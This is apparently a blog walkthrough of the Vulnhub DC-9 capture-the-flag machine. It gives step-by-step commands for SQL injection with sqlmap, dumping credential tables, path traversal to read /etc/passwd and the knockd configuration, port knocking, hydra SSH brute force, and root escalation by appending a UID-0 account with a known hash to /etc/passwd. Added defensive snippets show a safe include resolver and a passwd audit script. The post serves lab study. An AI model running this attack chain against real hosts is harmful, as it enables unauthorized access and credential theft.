Vulnhub: Detailed Walkthrough of the DC-9 Target Machine

Table of contents

I. Introduction to the target machine

Vulnhub target machine download:

II. The penetration process

1. Information Collection

2. Web penetration

a. http access port 80

b. SQL injection vulnerability

3. Use knockd to open ssh

4. Privilege escalation

1. Basic methods of privilege escalation

V. Summary


I. Introduction to the target machine

Vulnhub target machine download:

Official website address: https://download.vulnhub.com/dc/DC-9.zip

DC-9 boot screen (screenshot)

II. The penetration process

1. Information Collection

Host discovery

Either arp-scan or nmap on Kali will do:

arp-scan -l
nmap -sP 192.168.184.0/24

The IP of DC-9 is 192.168.184.128

Port scan

nmap -T4 -A -v 192.168.184.128

Ports 80 and 22 are found, but port 22 is closed.

2. Web penetration

a. http access port 80

 

Approaches worth considering: right-click / F12 to view the source code, SQL injection, brute-force login, and directory scanning.

nikto -host 192.168.184.128    # nikto fills in port 80 and the default root directory automatically

Found /config.php and /includes

Visiting /config.php gives a blank page, possibly because of missing permissions.

Visit /includes  

Test search.php for SQL injection:

 'or 1=1#

The request goes to results.php, which indicates that this page is likely injectable.

Press F12 to view the request URL and parameters

b. SQL injection vulnerability

Run sqlmap

sqlmap -u "http://192.168.184.128/results.php" --data="search=1"   # check whether the parameter is injectable

There is a SQL injection vulnerability.

Enumerate the databases

sqlmap -u "http://192.168.184.128/results.php" --data "search=1" --dbs  # list the databases

Three databases:

[*] information_schema
[*] Staff
[*] users 

Dump the users database first

sqlmap -u "http://192.168.184.128/results.php" --data "search=1" -D users --tables

1. Dump the UserDetails table

sqlmap -u "http://192.168.184.128/results.php" --data "search=1" -D users -T UserDetails --dump  # dump the account/password table

 

Write the usernames and passwords into txt files.

 sqlmap -u "http://192.168.184.128/results.php" --data "search=1" -C "username,password" -T "UserDetails" -D "users" --dump

 

Copied into the files user-dict and pass-dict.

2. Dump the Staff database

sqlmap -u "http://192.168.184.128/results.php" --data "search=1" -D Staff --tables

Dump the Users table

sqlmap -u "http://192.168.184.128/results.php" --data "search=1" -D Staff -T Users --dump --batch  # --batch runs non-interactively

Got lucky: admin: transorbital1

admin | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1)  

Log in

 

After logging in, the page shows the message "File does not exist". A file that does not exist is being displayed, which suggests a file inclusion vulnerability.

Use wfuzz to find the parameter that includes /etc/passwd; the session cookie is required.

 wfuzz -b 'PHPSESSID=rjo08bi63fp8js96948u40sas8' -w /usr/share/wfuzz/wordlist/general/common.txt  http://192.168.184.128/manage.php?FUZZ=../../../../etc/passwd 

Filter out the default responses with --hw 100

wfuzz -b 'PHPSESSID=rjo08bi63fp8js96948u40sas8' -w /usr/share/wfuzz/wordlist/general/common.txt --hw 100 http://192.168.184.128/manage.php?FUZZ=../../../../etc/passwd

Confirmed: there is a file inclusion vulnerability at http://<ip>/manage.php?file=../../../../etc/passwd

Brute-force ssh with hydra
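As a defender's counterpart to the file inclusion found above, an added example (not code from the original post or the DC-9 machine) showing the unsafe include pattern next to a hardened resolver that pins the requested file inside one allowed directory; the web paths are hypothetical.

```python
import os
from typing import Optional

# Hypothetical web layout (not DC-9's real paths): includes may only be
# served from this one directory.
WEB_ROOT = "/var/www/html"
INCLUDE_DIR = os.path.join(WEB_ROOT, "includes")


def unsafe_include_path(user_file: str) -> str:
    """Vulnerable pattern: the 'file' parameter is joined to the base
    directory with no validation, so '../' segments walk out of it."""
    return os.path.normpath(os.path.join(INCLUDE_DIR, user_file))


def safe_include_path(user_file: str) -> Optional[str]:
    """Hardened resolver: resolve the path and require it to stay under
    INCLUDE_DIR. Returns None (the page can then answer 'File does not
    exist') when the request escapes the directory, is absolute, names
    the directory itself, or carries a NUL byte."""
    if not user_file or "\x00" in user_file:
        return None
    base = os.path.realpath(INCLUDE_DIR)
    candidate = os.path.realpath(os.path.join(base, user_file))
    # commonpath rejects anything outside base, including prefix tricks
    # such as '/var/www/html/includes_evil/x'.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def is_traversal_attempt(user_file: str) -> bool:
    """True when the hardened resolver refuses a 'file' value: a quick
    check to run over request logs to spot probing like the one above."""
    return safe_include_path(user_file) is None
```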

hydra -L user-dict -P pass-dict 192.168.184.128 ssh

However, the attack did not succeed; port 22 turns out to be filtered, which points to a firewall.

3. Use knockd to open ssh

  1. knockd is a port-knock server. It listens to all traffic on an Ethernet (or other available) interface, waiting for a special sequence of port hits. A client such as telnet, PuTTY, or nc initiates a port hit by sending TCP or UDP packets to the chosen ports on the server.
  2. Port knocking is a way of opening previously closed ports from outside through connection attempts. Once the correct sequence of connection attempts is received, the firewall dynamically opens certain ports to the host that sent it.

The default configuration path for the knockd service:/etc/knockd.conf

Use the file inclusion vulnerability to read the configuration and obtain the knock sequence, which can be thought of as the password for the door: sequence = 7469,8475,9842

Test these three ports with nmap in turn:

nmap -p 7469 192.168.184.128
nmap -p 8475 192.168.184.128
nmap -p 9842 192.168.184.128

Check port 22 again with nmap.

Then run hydra again: hydra -L user-dict -P pass-dict 192.168.184.128 ssh

hydra finds three valid accounts; open three new terminals and log in as each of them.

 1. chandlerb user

 2. joeyt user

 3. janitor user, whose home directory contains a password.txt

Add those passwords to pass-dict1 and run hydra again.

Log in as fredf over ssh: ssh fredf@192.168.184.128

Run sudo -l to see which commands this user may run as root:

It turns out fredf can run a program as root that reads any file and appends its contents to any other file, which can be used to escalate privileges.

Enter the directory /opt/devstuff/dist/test/ to look at the test file; it is a compiled Python program.

4. Privilege escalation

1. Basic methods of privilege escalation

history, sudo -l, ls -a, find / ...

sudo (a Linux system administration command that lets the administrator allow ordinary users to run some or all commands, such as halt, reboot, su, etc. In other words, through this command non-root users can run commands that normally require root permissions)

Kernel vulnerabilities

SUID

Scheduled tasks (cron)

Take the Kali machine as an example

View user information with cat

cat /etc/passwd

The UID of the root user is 0

Use openssl to generate a password hash and build a new user named admin

Save the new user's line to a temporary file /tmp/passwd

View the result

openssl passwd -1 -salt admin 123456 
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
cat /tmp/passwd

Now in the ssh session as fredf

Use the test program to append the constructed user line to /etc/passwd

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
sudo ./test /tmp/passwd /etc/passwd
cat /etc/passwd

Check /etc/passwd: the new user has been added.

 

Use su to switch to admin with the password 123456

Privilege escalation successful!

V. Summary

Summary of the DC-9 target machine penetration:
1. When you meet a login page on the web, consider several approaches: F12 to view the source code, SQL injection, brute-force login, directory scanning, and so on. When a file inclusion vulnerability is present, think about which files are worth reading, such as user information in /etc/passwd.

2. When the ssh service on port 22 is not open (filtered), search for a way around the closed port: learn about the knockd service, find its configuration path, and use the knock sequence to open ssh.

3. After obtaining the py file in the fredf user's sudo rights, which can read and append files, familiarity with Linux commands is what matters: openssl creates the hash for a new user admin:123456, the line is saved to /tmp/passwd and appended to /etc/passwd, and su logs in as admin. Privilege escalation successful!

New knowledge points:
①: The default path of the knockd service configuration: /etc/knockd.conf
②: The hydra tool is very convenient to use (and very powerful!)
③: The basics of traversing a web file inclusion vulnerability to read information
④: The format of /etc/passwd; it is easy to make mistakes if you do not understand it.
Format: Username:Password:UID (User ID):GID (Group ID):Descriptive Information:Home Directory:Default Shell
("x" indicates that this user has a password, but it is not the real password; the real password is stored in /etc/shadow. A shell that allows login is /bin/bash, and a shell that prohibits login is /sbin/nologin.)
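From the defender's side, an added example (not code from the original post or the DC-9 machine) that parses /etc/passwd in the seven-field format described above and flags what the escalation in section 4 leaves behind: a second UID-0 account and a password hash sitting in /etc/passwd instead of /etc/shadow. The sample lines are constructed; the admin line is the one appended in the walkthrough.

```python
import re
from typing import Dict, List

# Constructed sample of /etc/passwd lines (UIDs/GIDs are made up). The last
# line has the exact shape of the entry appended in the walkthrough above:
# a hash in field 2 instead of 'x', UID 0, GID 0, home /root.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003::/home/fredf:/bin/bash
admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash
"""

# Field order: Username:Password:UID:GID:Description:Home:Shell
FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
HASH_RE = re.compile(r"^\$[A-Za-z0-9]+\$")   # $1$, $5$, $6$, $y$ ... prefixes


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split each line into the seven colon-separated fields. Lines that do
    not have exactly seven fields are skipped, as libc would skip them."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) == len(FIELDS):
            entries.append(dict(zip(FIELDS, parts)))
    return entries


def audit_passwd(text: str) -> List[str]:
    """One finding per suspicious entry: a second UID-0 account, an empty
    password field (login without a password), or a hash kept in
    /etc/passwd instead of /etc/shadow ('x', '*' and '!' are normal)."""
    findings = []
    for e in parse_passwd(text):
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(f"{e['name']}: extra UID 0 account, home {e['home']}")
        if e["passwd"] == "":
            findings.append(f"{e['name']}: empty password field")
        elif HASH_RE.match(e["passwd"]):
            findings.append(f"{e['name']}: password hash stored in /etc/passwd")
    return findings
```

Run it against the real file with audit_passwd(open("/etc/passwd").read()); an empty list is the expected result on a clean host.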
 

Source: blog.csdn.net/m0_65712192/article/details/129250059